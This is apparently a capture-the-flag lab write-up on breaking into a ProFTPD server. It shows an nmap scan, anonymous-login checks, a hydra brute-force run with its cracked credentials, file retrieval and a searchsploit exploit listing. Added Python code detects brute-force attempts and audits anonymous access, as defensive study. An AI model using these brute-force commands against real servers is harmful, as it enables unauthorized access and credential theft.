Exploiting FTP

FTP (File Transfer Protocol) is a protocol that uses TCP port 21 and is used to facilitate file sharing between a server and one or more clients.

It is also frequently used as a means of transferring files to and from the directory of a web server.

FTP authentication requires a username and password combination. As a result, we can perform a brute-force attack on the FTP server in order to identify legitimate credentials.

In some cases, FTP servers may be configured to allow anonymous access, which consequently allows anyone to access the FTP server without providing any legitimate credentials.
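Seen from the server side, both of these checks leave a trace in the FTP daemon's auth log. The detector below is an added example, not course material: it flags anonymous probes and bursts of failed logins from one source. The sample lines are constructed in the style of ProFTPD's messages (the exact log format and the five-failures-per-minute threshold are assumptions).

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample in the style of ProFTPD auth messages (format is an assumption).
SAMPLE_LOG = """\
Oct 18 09:18:40 target-1 proftpd[101] target-1 (192.139.31.2[192.139.31.2]): USER anonymous: no such user found
Oct 18 09:25:25 target-1 proftpd[102] target-1 (192.139.31.2[192.139.31.2]): USER sysadmin (Login failed): Incorrect password
Oct 18 09:25:25 target-1 proftpd[103] target-1 (192.139.31.2[192.139.31.2]): USER sysadmin (Login failed): Incorrect password
Oct 18 09:25:26 target-1 proftpd[104] target-1 (192.139.31.2[192.139.31.2]): USER sysadmin (Login failed): Incorrect password
Oct 18 09:25:26 target-1 proftpd[105] target-1 (192.139.31.2[192.139.31.2]): USER sysadmin (Login failed): Incorrect password
Oct 18 09:25:27 target-1 proftpd[106] target-1 (192.139.31.2[192.139.31.2]): USER sysadmin (Login failed): Incorrect password
Oct 18 09:25:27 target-1 proftpd[107] target-1 (192.139.31.2[192.139.31.2]): USER sysadmin: Login successful
"""
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ proftpd\[\d+\] \S+ \((?P<src>[\d.]+)\[[\d.]+\]\): "
    r"USER (?P<user>\S+?)(?::| \(Login failed\):) (?P<msg>.+)$")

def parse_line(line):
    """Return (timestamp, source_ip, user, success) or None for a non-auth line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # syslog has no year; deltas still work
    return ts, m["src"], m["user"], m["msg"].startswith("Login successful")

def detect(lines, max_failures=5, window_s=60):
    """Per source IP, keep a sliding window of failed logins. Alert on anonymous probes,
    on the window filling up (hydra ran ~3000 tries/min), and on a success after a full window."""
    failures = defaultdict(deque)
    alerts = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, src, user, ok = parsed
        if user in {"anonymous", "ftp"}:
            alerts.append(("anonymous_probe", src, user))
        q = failures[src]
        if ok:
            if len(q) >= max_failures:
                alerts.append(("success_after_bruteforce", src, user))
            continue
        q.append(ts)
        while q and (ts - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) == max_failures:  # fire once, when the threshold is crossed
            alerts.append(("bruteforce", src, user))
    return alerts
```

Calling `detect(SAMPLE_LOG.splitlines())` yields three alerts for the sample: the anonymous probe, the burst of failures, and the success that follows it.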

Demo: Exploiting FTP

ifconfig

eth1: inet 192.93.66.2

nmap -sV 192.93.66.3

Check whether anonymous access is enabled.

In this lab, anonymous access is disabled:

ftp 192.93.66.3

Name (192.93.66.3:root): anonymous
Password:
530 Login incorrect.
ftp> exit

Alternatively, check whether the FTP server supports anonymous access using the nmap ftp-anon script:

ls -al /usr/share/nmap/scripts/ | grep ftp-*
-rw-r--r-- 1 root root 4530 Jan 9 2019 ftp-anon.nse

Perform a brute-force attack with hydra, then log in with a recovered credential and retrieve the file:

hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.93.66.3 -t 4 ftp
ftp 192.93.66.3
Name (192.93.66.3:root): sysadmin
Password: 654321
230 User sysadmin logged in
ftp> dir
ftp> get secret.txt
ftp> exit

ls
cat secret.txt

Try to log in as administrator as well:

ftp 192.93.66.3
Name (192.93.66.3:root): administrator
Password: qwerty
ftp> dir
ftp> exit
nmap -sV 192.93.66.3

PORT    STATE   SERVICE VERSION
21/tcp  open    ftp     ProFTPD 1.3.5a

searchsploit is a command-line utility that lets you search the Exploit-DB database for exploits matching a service name and version.

searchsploit ProFTPD

ProFTP Recon: Basics

Overview

In this challenge you will learn the basics of ProFTP server reconnaissance. Start the lab and answer the following questions:

Questions

  1. What is the version of the FTP server?
  2. Using the username wordlist /usr/share/metasploit-framework/data/wordlists/common_users.txt and the password wordlist /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt, check whether any of these credentials are valid on the system. List all credentials found.
  3. Use an nmap script to find the password of the user "sysadmin".
  4. Find the seven flags hidden on the server.

Instructions:

  • This lab is dedicated to you! There are no other users on this network :)
  • Once you start the lab, you will have access to a root terminal of a Kali instance
  • Your Kali has an interface with IP address 192.X.Y.Z. Run "ip addr" to find the values of X and Y.
  • The target machine should be located at IP address 192.X.Y.3.
  • Do not attack the gateway located at IP address 192.X.Y.1

My own approach

root@attackdefense:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.1.0.3  netmask 255.255.0.0  broadcast 10.1.255.255
        ether 02:42:0a:01:00:03  txqueuelen 0  (Ethernet)
        RX packets 101  bytes 9626 (9.4 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 94  bytes 312658 (305.3 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.139.31.2  netmask 255.255.255.0  broadcast 192.139.31.255
        ether 02:42:c0:8b:1f:02  txqueuelen 0  (Ethernet)
        RX packets 15  bytes 1306 (1.2 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 18  bytes 1656 (1.6 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 18  bytes 1656 (1.6 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
root@attackdefense:~# nmap -sV 192.139.31.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-10-18 09:18 UTC
Nmap scan report for target-1 (192.139.31.3)
Host is up (0.0000090s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5a
MAC Address: 02:42:C0:8B:1F:03 (Unknown)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.53 seconds
root@attackdefense:~# ftp 192.139.31.3
Connected to 192.139.31.3.
220 ProFTPD 1.3.5a Server (AttackDefense-FTP) [::ffff:192.139.31.3]
Name (192.139.31.3:root): anonymous
331 Password required for anonymous
Password:
530 Login incorrect.
Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> exit
221 Goodbye.
root@attackdefense:~# ls -al /usr/share/nmap/scripts | grep ftp
-rw-r--r-- 1 root root  4530 Jan  9  2019 ftp-anon.nse
-rw-r--r-- 1 root root  3253 Jan  9  2019 ftp-bounce.nse
-rw-r--r-- 1 root root  3108 Jan  9  2019 ftp-brute.nse
-rw-r--r-- 1 root root  3258 Jan  9  2019 ftp-libopie.nse
-rw-r--r-- 1 root root  3295 Jan  9  2019 ftp-proftpd-backdoor.nse
-rw-r--r-- 1 root root  3748 Jan  9  2019 ftp-syst.nse
-rw-r--r-- 1 root root  6007 Jan  9  2019 ftp-vsftpd-backdoor.nse
-rw-r--r-- 1 root root  5943 Jan  9  2019 ftp-vuln-cve2010-4221.nse
-rw-r--r-- 1 root root  5678 Jan  9  2019 tftp-enum.nse

ftp-anon

Checks whether the FTP server allows anonymous login.

If anonymous login is allowed, it retrieves a directory listing of the root directory and highlights writable files.
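A self-audit that performs the same two checks (anonymous login, then world-writable entries in the root listing), as an added example and not the nmap script's own code. The listing below is constructed in the LIST format the transcript shows, and the host passed to audit_anonymous is the lab target.

```python
import ftplib
import re

# One Unix-style LIST line, like "-rw-r--r--   1 0  0  33 Nov 20  2018 secret.txt" above.
LIST_RE = re.compile(
    r"^([-dl])([rwx-]{9})\s+\d+\s+\S+\s+\S+\s+\d+\s+\w{3}\s+\d+\s+[\d:]+\s+(.+)$")

# Constructed listing for offline use: one world-writable directory and one file.
SAMPLE_LISTING = [
    "-rw-r--r--   1 0        0              33 Nov 20  2018 secret.txt",
    "drwxrwxrwx   2 0        0            4096 Nov 20  2018 upload",
    "-rw-rw-rw-   1 0        0               0 Nov 20  2018 notes.txt",
]

def world_writable(listing):
    """Names whose 'others' triplet grants write (mode char index 7 of the 9)."""
    return [m.group(3) for m in map(LIST_RE.match, listing) if m and m.group(2)[7] == "w"]

def audit_anonymous(host, port=21, timeout=5):
    """Attempt the anonymous login from the lab, then list the root directory.
    Returns (anonymous_allowed, world_writable_names)."""
    ftp = ftplib.FTP(timeout=timeout)
    ftp.connect(host, port)
    try:
        ftp.login()                      # ftplib defaults to USER anonymous
    except ftplib.error_perm:            # e.g. "530 Login incorrect." as in the transcript
        ftp.close()
        return False, []
    lines = []
    ftp.retrlines("LIST", lines.append)  # listing arrives over the data channel
    ftp.quit()
    return True, world_writable(lines)
```

Against the lab target, `audit_anonymous("192.139.31.3")` returns `(False, [])`, matching the manual check; `world_writable(SAMPLE_LISTING)` shows what a positive result looks like.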

root@attackdefense:~# hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.139.31.3 -t 4 ftp
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-10-18 09:25:25
[DATA] max 4 tasks per 1 server, overall 4 tasks, 7063 login tries (l:7/p:1009), ~1766 tries per task
[DATA] attacking ftp://192.139.31.3:21/
[21][ftp] host: 192.139.31.3   login: sysadmin   password: 654321
[21][ftp] host: 192.139.31.3   login: rooty   password: qwerty
[21][ftp] host: 192.139.31.3   login: demo   password: butterfly
[STATUS] 3054.00 tries/min, 3054 tries in 00:01h, 4009 to do in 00:02h, 4 active
[21][ftp] host: 192.139.31.3   login: auditor   password: chocolate
[21][ftp] host: 192.139.31.3   login: anon   password: purple
[21][ftp] host: 192.139.31.3   login: administrator   password: tweety
[STATUS] 3029.50 tries/min, 6059 tries in 00:02h, 1004 to do in 00:01h, 4 active
[21][ftp] host: 192.139.31.3   login: diag   password: tigger
1 of 1 target successfully completed, 7 valid passwords found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 4 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-10-18 09:27:39
root@attackdefense:~# echo "sysadmin" > users
root@attackdefense:~# nmap --script ftp-brute --script-args userdb=/root/users -p 21 192.205.242.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-10-18 10:46 UTC
Nmap scan report for target-1 (192.205.242.3)
Host is up (0.000046s latency).

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-brute: 
|   Accounts: 
|     sysadmin:654321 - Valid credentials
|_  Statistics: Performed 25 guesses in 5 seconds, average tps: 5.0
MAC Address: 02:42:C0:CD:F2:03 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 6.19 seconds
sysadmin:654321
rooty:qwerty
demo:butterfly
auditor:chocolate
anon:purple
administrator:tweety
diag:tigger
root@attackdefense:~# ftp 192.139.31.3
Connected to 192.139.31.3.
220 ProFTPD 1.3.5a Server (AttackDefense-FTP) [::ffff:192.139.31.3]
Name (192.139.31.3:root): sysadmin
331 Password required for sysadmin
Password:
230 User sysadmin logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 0        0              33 Nov 20  2018 secret.txt
226 Transfer complete
ftp> get secret.txt
local: secret.txt remote: secret.txt
200 PORT command successful
150 Opening BINARY mode data connection for secret.txt (33 bytes)
226 Transfer complete
33 bytes received in 0.00 secs (152.0121 kB/s)
ftp> exit
221 Goodbye.
root@attackdefense:~# ls
README  secret.txt  tools  wordlists
root@attackdefense:~# cat secret.txt 
260ca9dd8a4577fc00b7bd5810298076
root@attackdefense:~# searchsploit ProFTPD
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                     |  Path
                                                                                                                                                   | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
FreeBSD - 'ftpd / ProFTPd' Remote Command Execution                                                                                                | exploits/freebsd/remote/18181.txt
ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Local Overflow                                                                                              | exploits/linux/local/394.c
ProFTPd - 'mod_mysql' Authentication Bypass                                                                                                        | exploits/multiple/remote/8037.txt
ProFTPd - 'mod_sftp' Integer Overflow Denial of Service (PoC)                                                                                      | exploits/linux/dos/16129.txt
ProFTPd 1.2 - 'SIZE' Remote Denial of Service                                                                                                      | exploits/linux/dos/20536.java
ProFTPd 1.2 < 1.3.0 (Linux) - 'sreplace' Remote Buffer Overflow (Metasploit)                                                                       | exploits/linux/remote/16852.rb
ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1)                                                                                  | exploits/linux/remote/19475.c
ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2)                                                                                  | exploits/linux/remote/19476.c
ProFTPd 1.2 pre6 - 'snprintf' Remote Root                                                                                                          | exploits/linux/remote/19503.txt
ProFTPd 1.2.0 pre10 - Remote Denial of Service                                                                                                     | exploits/linux/dos/244.java
ProFTPd 1.2.0 rc2 - Memory Leakage                                                                                                                 | exploits/linux/dos/241.c
ProFTPd 1.2.10 - Remote Users Enumeration                                                                                                          | exploits/linux/remote/581.c
ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force                                                                                     | exploits/linux/remote/110.c
ProFTPd 1.2.7/1.2.8 - '.ASCII' File Transfer Buffer Overrun                                                                                        | exploits/linux/dos/23170.c
ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection                                                                                                        | exploits/linux/remote/43.pl
ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (1)                                                                                        | exploits/linux/remote/107.c
ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (2)                                                                                        | exploits/linux/remote/3021.txt
ProFTPd 1.2.x - 'STAT' Denial of Service                                                                                                           | exploits/linux/dos/22079.sh
ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection                                                                                                   | exploits/multiple/remote/32798.pl
ProFTPd 1.3.0 (OpenSUSE) - 'mod_ctrls' Local Stack Overflow                                                                                        | exploits/unix/local/10044.pl
ProFTPd 1.3.0 - 'sreplace' Remote Stack Overflow (Metasploit)                                                                                      | exploits/linux/remote/2856.pm
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1)                                                                             | exploits/linux/local/3330.pl
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (2)                                                                             | exploits/linux/local/3333.pl
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' exec-shield Local Overflow                                                                                      | exploits/linux/local/3730.txt
ProFTPd 1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (PoC)                                                                                 | exploits/linux/dos/2928.py
ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)                                                                     | exploits/linux/remote/16878.rb
ProFTPd 1.3.2 rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit)                                                                       | exploits/linux/remote/16851.rb
ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution                                                                                 | exploits/linux/remote/15662.txt
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)                                                                                          | exploits/linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution                                                                                                | exploits/linux/remote/36803.py
ProFTPd 1.3.5 - File Copy                                                                                                                          | exploits/linux/remote/36742.txt
ProFTPd 1.x - 'mod_tls' Remote Buffer Overflow                                                                                                     | exploits/linux/remote/4312.c
ProFTPd IAC 1.3.x - Remote Command Execution                                                                                                       | exploits/linux/remote/15449.pl
ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)                                                                                           | exploits/linux/remote/16921.rb
WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Remote Buffer Overflow (1)                                                   | exploits/linux/remote/19086.c
WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Remote Buffer Overflow (2)                                                   | exploits/linux/remote/19087.c
WU-FTPD 2.4/2.5/2.6 / Trolltech ftpd 1.2 / ProFTPd 1.2 / BeroFTPD 1.3.4 FTP - glob Expansion                                                       | exploits/linux/remote/20690.sh
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Solution

The solution for this lab is available in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-518.pdf
